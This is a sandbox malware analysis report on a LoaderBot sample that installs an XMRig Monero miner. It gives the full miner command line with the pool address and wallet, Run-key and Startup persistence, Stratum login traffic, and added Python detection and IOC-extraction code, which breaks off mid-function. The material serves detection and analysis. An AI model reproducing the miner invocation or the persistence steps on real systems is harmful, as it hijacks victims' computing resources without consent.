
Windows Analysis Report
kWYLtJ0Cn1.exe

Overview

General Information

Sample name: kWYLtJ0Cn1.exe (renamed because the original name is a hash value)
Original sample name: 917f9d9d484f8657efc7f60b8adde947.exe
Analysis ID: 1479411
MD5: 917f9d9d484f8657efc7f60b8adde947
SHA1: 01e4648cef9fb934429d63471127805120202ca9
SHA256: 1099655a13691a6c4856fa29fa038e89805c8ff7ba6d04c6c56128728be19ff4
Tags: 32, exe, trojan

Detection

LoaderBot, Xmrig
Score: 100 (range: 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Xmrig
Yara detected LoaderBot
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Allocates memory in foreign processes
Contains functionality to inject code into remote processes
Detected Stratum mining protocol
Found strings related to Crypto-Mining
Injects a PE file into a foreign processes
Machine Learning detection for sample
Sigma detected: Potential Crypto Mining Activity
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • kWYLtJ0Cn1.exe (PID: 7312 cmdline: "C:\Users\user\Desktop\kWYLtJ0Cn1.exe" MD5: 917F9D9D484F8657EFC7F60B8ADDE947)
    • RegAsm.exe (PID: 7368 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • Driver.exe (PID: 7476 cmdline: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2 MD5: 02569A7A91A71133D4A1023BF32AA6F4)
        • conhost.exe (PID: 7484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WerFault.exe (PID: 7588 cmdline: C:\Windows\system32\WerFault.exe -u -p 7476 -s 764 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • Driver.exe (PID: 7632 cmdline: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2 MD5: 02569A7A91A71133D4A1023BF32AA6F4)
        • conhost.exe (PID: 7656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WerFault.exe (PID: 4208 cmdline: C:\Windows\system32\WerFault.exe -u -p 7632 -s 864 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • Driver.exe (PID: 6272 cmdline: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2 MD5: 02569A7A91A71133D4A1023BF32AA6F4)
        • conhost.exe (PID: 6564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WerFault.exe (PID: 8012 cmdline: C:\Windows\system32\WerFault.exe -u -p 6272 -s 864 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • Driver.exe (PID: 4336 cmdline: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2 MD5: 02569A7A91A71133D4A1023BF32AA6F4)
        • conhost.exe (PID: 1244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7540 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 7572 cmdline: C:\Windows\system32\WerFault.exe -pss -s 444 -p 7476 -ip 7476 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 3052 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 1368 cmdline: C:\Windows\system32\WerFault.exe -pss -s 476 -p 7632 -ip 7632 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • WerFault.exe (PID: 4520 cmdline: C:\Windows\system32\WerFault.exe -pss -s 544 -p 6272 -ip 6272 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
Source | Rule | Description | Author
dump.pcap | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security

Source | Rule | Description | Author
00000010.00000002.3707277603.00000000005FE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000014.00000002.4118678441.0000000000421000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000007.00000002.3093772534.0000000000466000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000007.00000003.2163629523.0000000000465000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000001.00000002.4118537501.000000000067C000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_LoaderBot | Yara detected LoaderBot | Joe Security
(list truncated in this view; the report lists 25 entries)

Source | Rule | Description | Author | Strings
0.2.kWYLtJ0Cn1.exe.ffcbc0.1.unpack | JoeSecurity_LoaderBot | Yara detected LoaderBot | Joe Security |
0.2.kWYLtJ0Cn1.exe.ffcbc0.1.unpack | MALWARE_Win_CoinMiner04 | Detects coinmining malware | ditekSHen | see below
  • 0x3f3735:$s1: createDll
  • 0x3f3a21:$s2: getTasks
  • 0x3f388f:$s3: SetStartup
  • 0x3f3763:$s4: loadUrl
  • 0x3f3912:$s5: Processer
  • 0x3f3a8e:$s6: checkProcess
  • 0x3f3a9b:$s7: runProcess
  • 0x3f393a:$s8: createDir
  • 0x3f3c4f:$cnc1: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
  • 0x3f3ce3:$cnc2: ?hwid=
  • 0x3f3d13:$cnc3: ?timeout=1
  • 0x3f3e45:$cnc4: &completed=
1.2.RegAsm.exe.400000.0.unpack | JoeSecurity_LoaderBot | Yara detected LoaderBot | Joe Security |
1.2.RegAsm.exe.400000.0.unpack | MALWARE_Win_CoinMiner04 | Detects coinmining malware | ditekSHen | see below
  • 0x3f5535:$s1: createDll
  • 0x3f5821:$s2: getTasks
  • 0x3f568f:$s3: SetStartup
  • 0x3f5563:$s4: loadUrl
  • 0x3f5712:$s5: Processer
  • 0x3f588e:$s6: checkProcess
  • 0x3f589b:$s7: runProcess
  • 0x3f573a:$s8: createDir
  • 0x3f5a4f:$cnc1: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
  • 0x3f5ae3:$cnc2: ?hwid=
  • 0x3f5b13:$cnc3: ?timeout=1
  • 0x3f5c45:$cnc4: &completed=
0.2.kWYLtJ0Cn1.exe.f60000.0.unpack | JoeSecurity_LoaderBot | Yara detected LoaderBot | Joe Security |
(list truncated in this view; the report lists 1 entry)

Bitcoin Miner

Source: Process started
Author: Joe Security
Data:
  Command: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2
  CommandLine: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2
  CommandLine|base64offset|contains: (empty)
  Image: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe
  NewProcessName: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe
  OriginalFileName: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe
  ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  ParentProcessId: 7368
  ParentProcessName: RegAsm.exe
  ProcessCommandLine: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2
  ProcessId: 7476
  ProcessName: Driver.exe

System Summary

Source: Process started
Author: Florian Roth (Nextron Systems)
Data:
  Command: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2
  CommandLine: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2
  CommandLine|base64offset|contains: (empty)
  Image: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe
  NewProcessName: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe
  OriginalFileName: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe
  ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  ParentProcessId: 7368
  ParentProcessName: RegAsm.exe
  ProcessCommandLine: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2
  ProcessId: 7476
  ProcessName: Driver.exe

Source: Registry Key set
Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
Data:
  Details: C:\Users\user\AppData\Roaming\Sysfiles\RegAsm.exe
  EventID: 13
  EventType: SetValue
  Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  ProcessId: 7368
  TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver

Source: Process started
Author: vburov
Data:
  Command: C:\Windows\System32\svchost.exe -k WerSvcGroup
  CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup
  CommandLine|base64offset|contains: (empty)
  Image: C:\Windows\System32\svchost.exe
  NewProcessName: C:\Windows\System32\svchost.exe
  OriginalFileName: C:\Windows\System32\svchost.exe
  ParentCommandLine: (empty)
  ParentImage: (empty)
  ParentProcessId: 620
  ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup
  ProcessId: 7540
  ProcessName: svchost.exe

Data Obfuscation

Source: File created
Author: Joe Security
Data:
  EventID: 11
  Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  ProcessId: 7368
  TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url
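The Sigma matches above reduce to three observable facts (a miner-style command line, a Run value pointing into AppData, a .url dropped into the Startup folder), and the process tree adds a fourth: RegAsm.exe, a .NET SDK utility, launched with no arguments before it spawns the miner. The block below is an added example, not part of the Joe Sandbox report and not Sigma's rule code; it re-implements those checks in plain Python and runs them over constructed Sysmon-style events whose field values are copied from this page. Note what the page shows: the Run value named Driver points at ...\Sysfiles\RegAsm.exe (a copy of the .NET utility), not at Driver.exe, so a hunt keyed only on the miner's file name misses the persistence entry. The event field names, the two benign control events and the rule names are assumptions.

```python
"""Added example (not part of the Joe Sandbox report, not Sigma's rule code):
plain-Python versions of the checks that fired on this sample, run over
constructed Sysmon-style events whose field values are copied from the report."""
import re

WALLET = ("44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQ"
          "q1twJ21hupxAhrxeP32CjKnDp")  # -u argument on the Driver.exe command line
MINER_EXE = r"C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe"
REGASM = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
MINER_CMD = (f'"{MINER_EXE}" -o pool.supportxmr.com:3333 -u {WALLET} '
             "-p x -k -v=0 --donate-level=1 -t 2")

# Constructed events (Sysmon EventID 1 = process create, 11 = file create,
# 13 = registry SetValue). The last two are benign controls and must not fire.
EVENTS = [
    {"EventID": 1, "ProcessId": 7368, "Image": REGASM, "CommandLine": f'"{REGASM}"',
     "ParentImage": r"C:\Users\user\Desktop\kWYLtJ0Cn1.exe"},
    {"EventID": 1, "ProcessId": 7476, "Image": MINER_EXE, "CommandLine": MINER_CMD,
     "ParentImage": REGASM},
    {"EventID": 13, "ProcessId": 7368, "Image": REGASM, "EventType": "SetValue",
     "TargetObject": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver",
     "Details": r"C:\Users\user\AppData\Roaming\Sysfiles\RegAsm.exe"},
    {"EventID": 11, "ProcessId": 7368, "Image": REGASM,
     "TargetFilename": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url"},
    {"EventID": 1, "ProcessId": 7484, "Image": r"C:\Windows\system32\conhost.exe",
     "CommandLine": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1", "ParentImage": MINER_EXE},
    {"EventID": 13, "ProcessId": 4000, "Image": r"C:\Windows\System32\msiexec.exe", "EventType": "SetValue",
     "TargetObject": r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Program Files\Vendor\Updater.exe"},
]

MONERO_ADDR = re.compile(r"4[1-9A-HJ-NP-Za-km-z]{94}")   # Base58, 95 chars, leading 4
POOL_ENDPOINT = re.compile(r"[A-Za-z0-9.-]+:\d{2,5}")
RUN_KEY = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Users\\Public)\\", re.I)
STARTUP_DROP = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.(url|lnk|exe|bat|cmd|vbs|js|ps1|hta)$", re.I)
DOTNET_HOSTS = {"regasm.exe", "regsvcs.exe", "installutil.exe", "msbuild.exe", "applaunch.exe"}


def parse_cmdline(cmdline):
    """Split a Windows command line into (exe, {flag: value}); handles -o X, -k, -v=0, --x=1."""
    toks = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]
    exe, args, opts, i = toks[0], toks[1:], {}, 0
    while i < len(args):
        a = args[i]
        if a.startswith("-") and "=" in a:                     # --donate-level=1, -v=0
            k, v = a.lstrip("-").split("=", 1)
            opts[k], i = v, i + 1
        elif a.startswith("-") and i + 1 < len(args) and not args[i + 1].startswith("-"):
            opts[a.lstrip("-")], i = args[i + 1], i + 2        # -o pool:port, -u wallet
        else:
            opts[a.lstrip("-")], i = True, i + 1               # bare switch such as -k
    return exe, opts


def miner_cmdline(ev):
    """Pool endpoint + Monero-shaped wallet (+ XMRig's --donate-level) on one command line."""
    if ev.get("EventID") != 1:
        return None
    _, o = parse_cmdline(ev["CommandLine"])
    pool = o.get("o") or o.get("url")
    wallet = o.get("u") or o.get("user")
    score = 0
    if isinstance(pool, str) and POOL_ENDPOINT.fullmatch(pool):
        score += 1
    if isinstance(wallet, str) and MONERO_ADDR.fullmatch(wallet):
        score += 2
    if "donate-level" in o:
        score += 1
    if score < 2:                    # a bare host:port alone is not enough to fire
        return None
    return {"rule": "miner command line", "pool": pool, "wallet": wallet, "threads": o.get("t")}


def run_key_persistence(ev):
    if ev.get("EventID") != 13 or ev.get("EventType") != "SetValue":
        return None
    if RUN_KEY.search(ev["TargetObject"]) and USER_WRITABLE.search(ev["Details"]):
        return {"rule": "run key to user-writable path",
                "value": ev["TargetObject"].rsplit("\\", 1)[-1], "target": ev["Details"]}
    return None


def startup_drop(ev):
    if ev.get("EventID") == 11 and STARTUP_DROP.search(ev["TargetFilename"]):
        return {"rule": "startup folder drop", "file": ev["TargetFilename"]}
    return None


def bare_dotnet_host(ev):
    """A .NET SDK utility started with no arguments does no useful work on its own;
    here it is the process the report shows LoaderBot running inside."""
    if ev.get("EventID") != 1:
        return None
    name = ev["Image"].rsplit("\\", 1)[-1].lower()
    if name in DOTNET_HOSTS and len(re.findall(r'"[^"]*"|\S+', ev["CommandLine"])) == 1:
        return {"rule": "bare .NET utility launch", "image": ev["Image"], "parent": ev.get("ParentImage")}
    return None


CHECKS = (miner_cmdline, run_key_persistence, startup_drop, bare_dotnet_host)


def scan(events):
    hits = []
    for ev in events:
        for check in CHECKS:
            hit = check(ev)
            if hit:
                hits.append(dict(hit, pid=ev.get("ProcessId")))
    return hits


if __name__ == "__main__":
    for h in scan(EVENTS):
        print(h)
```

The miner check scores the wallet higher than the pool endpoint on purpose: plenty of legitimate software takes a host:port argument, but a 95-character Base58 string starting with 4 beside one is rarely anything but a Monero payout address.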
No Snort rule has matched

Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
2024-07-23T15:48:56.694363+0200 | 2826930 | 49738 | 3333 | TCP | Crypto Currency Mining Activity Detected
2024-07-23T15:45:21.326757+0200 | 2826930 | 49743 | 3333 | TCP | Crypto Currency Mining Activity Detected
2024-07-23T15:45:36.297076+0200 | 2047928 | 51744 | 53 | UDP | Crypto Currency Mining Activity Detected
2024-07-23T15:47:54.453933+0200 | 2826930 | 49730 | 3333 | TCP | Crypto Currency Mining Activity Detected


AV Detection

Source: kWYLtJ0Cn1.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | ReversingLabs: Detection: 60%
Source: kWYLtJ0Cn1.exe | ReversingLabs: Detection: 50%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: kWYLtJ0Cn1.exe | Joe Sandbox ML: detected

Bitcoin Miner

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 00000010.00000002.3707277603.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.4118678441.0000000000421000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3093772534.0000000000466000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.2163629523.0000000000465000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1743254277.0000000000507000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.3283522965.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.2163629523.0000000000463000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.3707277603.0000000000581000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3093652919.000000000043D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1743254277.00000000004E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.3184707132.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.3383726249.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.2064137301.0000000000464000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.2399480104.0000000000465000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.4119483358.0000000140001000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1744696812.0000000140001000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: kWYLtJ0Cn1.exe PID: 7312, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 7368, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Driver.exe PID: 7476, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Driver.exe PID: 7632, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Driver.exe PID: 6272, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Driver.exe PID: 4336, type: MEMORYSTR
Source: global traffic | TCP traffic with Stratum login payload (the payload is identical on all nine connections and is shown once below):
  192.168.2.4:49730 -> 141.94.96.195:3333
  192.168.2.4:49738 -> 141.94.96.71:3333
  192.168.2.4:49739 -> 141.94.96.71:3333
  192.168.2.4:49740 -> 141.94.96.144:3333
  192.168.2.4:49741 -> 141.94.96.195:3333
  192.168.2.4:49742 -> 141.94.96.195:3333
  192.168.2.4:49743 -> 141.94.96.144:3333
  192.168.2.4:49744 -> 141.94.96.195:3333
  192.168.2.4:49745 -> 141.94.96.144:3333
  payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44wu5qltvqr3byskyjrsngj6jlvgtbpnxm28eiiqyz7fin6ki9mnbucuqghqqjpeon1vzqq1twj21hupxahrxep32cjkndp","pass":"x","agent":"xmrig/6.2.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","algo":["cn/0","cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/0","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/ccx","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx","rx/keva","argon2/chukwa","argon2/wrkz","astrobwt","kawpow"]}}
Source: Driver.exe | String found in binary or memory: stratum+tcp://
Source: kWYLtJ0Cn1.exe, 00000000.00000002.1675093789.0000000000FFC000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: @cryptonight/0cn
Source: Driver.exe, 00000002.00000002.1744696812.0000000140001000.00000040.00000001.01000000.00000006.sdmp | String found in binary or memory: -o, --url=URL URL of mining server
Source: Driver.exe, 00000002.00000002.1744696812.0000000140001000.00000040.00000001.01000000.00000006.sdmp | String found in binary or memory: Usage: xmrig [OPTIONS]
Source: Driver.exe, 00000002.00000002.1744696812.0000000140001000.00000040.00000001.01000000.00000006.sdmp | String found in binary or memory: XMRig 6.2.2
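All nine Stratum connections above carry the same JSON-RPC login object. One thing to check before lifting IOCs from it: the report renders the payload in lower case (compare the mixed-case wallet on the Driver.exe command line, and the agent string, which XMRig itself emits with capitals), so the wallet copied from the payload as printed is not a valid Base58 address and has to be reconciled with the command line. The block below is an added example, not part of the report and not XMRig's code: it splits newline-delimited Stratum messages out of reassembled TCP payloads, tells client and server messages apart, collapses repeated logins per pool endpoint, and flags a case-normalised wallet. The login object is rebuilt from the fields shown on the page; the server reply, the cut-off trailing segment and all function names are constructed.

```python
"""Added example (not part of the Joe Sandbox report, not XMRig's or the sample's
code): extract Stratum login IOCs from reassembled TCP payloads. The login object
is rebuilt from the fields the report shows (lowercased, as the report renders
it); the server reply and the cut-off trailing segment are constructed."""
import json
import re

CMDLINE_WALLET = ("44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQ"
                  "q1twJ21hupxAhrxeP32CjKnDp")  # mixed case, from the Driver.exe command line
AGENT = "xmrig/6.2.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019"
ALGOS = ["cn/0", "cn/1", "cn/2", "cn/r", "cn/fast", "cn/half", "cn/xao", "cn/rto", "cn/rwz",
         "cn/zls", "cn/double", "cn-lite/0", "cn-lite/1", "cn-heavy/0", "cn-heavy/tube",
         "cn-heavy/xhv", "cn-pico", "cn-pico/tlo", "cn/ccx", "rx/0", "rx/wow", "rx/loki",
         "rx/arq", "rx/sfx", "rx/keva", "argon2/chukwa", "argon2/wrkz", "astrobwt", "kawpow"]


def login_payload(wallet):
    """Newline-delimited JSON-RPC login, as XMRig sends it right after connecting."""
    msg = {"id": 1, "jsonrpc": "2.0", "method": "login",
           "params": {"login": wallet, "pass": "x", "agent": AGENT, "algo": ALGOS}}
    return (json.dumps(msg, separators=(",", ":")) + "\n").encode()


# Constructed pool reply: the shape of a Stratum login result, values invented.
SERVER_REPLY = (b'{"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"0123abcd",'
                b'"job":{"blob":"0e0e","job_id":"1","target":"b88d0600","algo":"rx/0"},'
                b'"status":"OK"}}\n')

# (src, sport, dst, dport, payload); endpoints copied from the report's traffic list.
SEGMENTS = [
    ("192.168.2.4", 49730, "141.94.96.195", 3333, login_payload(CMDLINE_WALLET.lower())),
    ("141.94.96.195", 3333, "192.168.2.4", 49730, SERVER_REPLY),
    ("192.168.2.4", 49741, "141.94.96.195", 3333, login_payload(CMDLINE_WALLET.lower())),
    ("192.168.2.4", 49738, "141.94.96.71", 3333,          # capture ends mid-message
     login_payload(CMDLINE_WALLET.lower()) + b'{"id":2,"jsonrpc":"2.0","method":"submit","par'),
]

MONERO_ADDR = re.compile(r"4[1-9A-HJ-NP-Za-km-z]{94}")   # Base58 alphabet: no 0, O, I, l
AGENT_RE = re.compile(r"([A-Za-z0-9_-]+)/(\d+(?:\.\d+)+)")


def looks_like_monero_address(s):
    return bool(MONERO_ADDR.fullmatch(s))


def split_messages(payload):
    """Stratum frames one JSON object per line; unparsable fragments are dropped."""
    msgs = []
    for line in payload.split(b"\n"):
        if not line.strip():
            continue
        try:
            msgs.append(json.loads(line))
        except ValueError:        # truncated at capture end, or not JSON at all
            continue
    return msgs


def classify(msg):
    method = msg.get("method")
    if method in ("login", "submit", "keepalived"):
        return "client:" + method
    if isinstance(msg.get("result"), dict) and "job" in msg["result"]:
        return "server:login-result"
    if method == "job":
        return "server:job"
    return "unknown"


def extract_iocs(segments):
    """One IOC record per (wallet, pool endpoint); repeated logins are collapsed."""
    seen, iocs = set(), []
    for src, sport, dst, dport, payload in segments:
        for msg in split_messages(payload):
            if classify(msg) != "client:login":
                continue
            p = msg.get("params", {})
            wallet = str(p.get("login", ""))
            key = (wallet.lower(), dst, dport)
            if key in seen:
                continue
            seen.add(key)
            m = AGENT_RE.match(str(p.get("agent", "")))
            iocs.append({
                "pool": f"{dst}:{dport}",
                "wallet": wallet,
                "worker_pass": p.get("pass"),
                "miner": (m.group(1).lower(), m.group(2)) if m else None,
                "algos": len(p.get("algo", [])),
                # A 95-char all-lowercase "address" is practically never a real one:
                # something normalised case, so reconcile it with the process command line.
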